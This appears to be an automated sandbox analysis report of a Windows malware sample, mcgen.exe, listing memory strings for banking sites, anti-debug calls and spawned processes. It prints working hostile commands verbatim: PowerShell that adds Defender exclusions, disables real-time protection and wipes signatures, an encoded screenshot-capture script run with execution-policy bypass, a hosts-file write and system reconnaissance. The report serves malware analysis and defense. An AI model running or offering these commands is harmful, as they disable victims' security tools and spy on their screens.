Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: getmac.exe, 0000004C.00000002.2290574092.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2286655465.0000022C192DA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287617818.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicerf
Source: getmac.exe, 0000004C.00000003.2287247169.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000002.2290374509.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C1929B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"m Fil
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 0_2_00007FF6B9F1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6B9F1D19C

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 2_2_00007FFD948A5DD0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFD948A5DD0

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 0_2_00007FF6B9F334F0 GetProcessHeap,

0_2_00007FF6B9F334F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F1D37C SetUnhandledExceptionFilter,	0_2_00007FF6B9F1D37C
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6B9F1D19C
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F1C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6B9F1C910
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6B9F2A684
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D2B6D8 SetUnhandledExceptionFilter,	103_2_00007FF695D2B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D2A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	103_2_00007FF695D2A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D2B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	103_2_00007FF695D2B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D34C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	103_2_00007FF695D34C10

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\mcgen.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
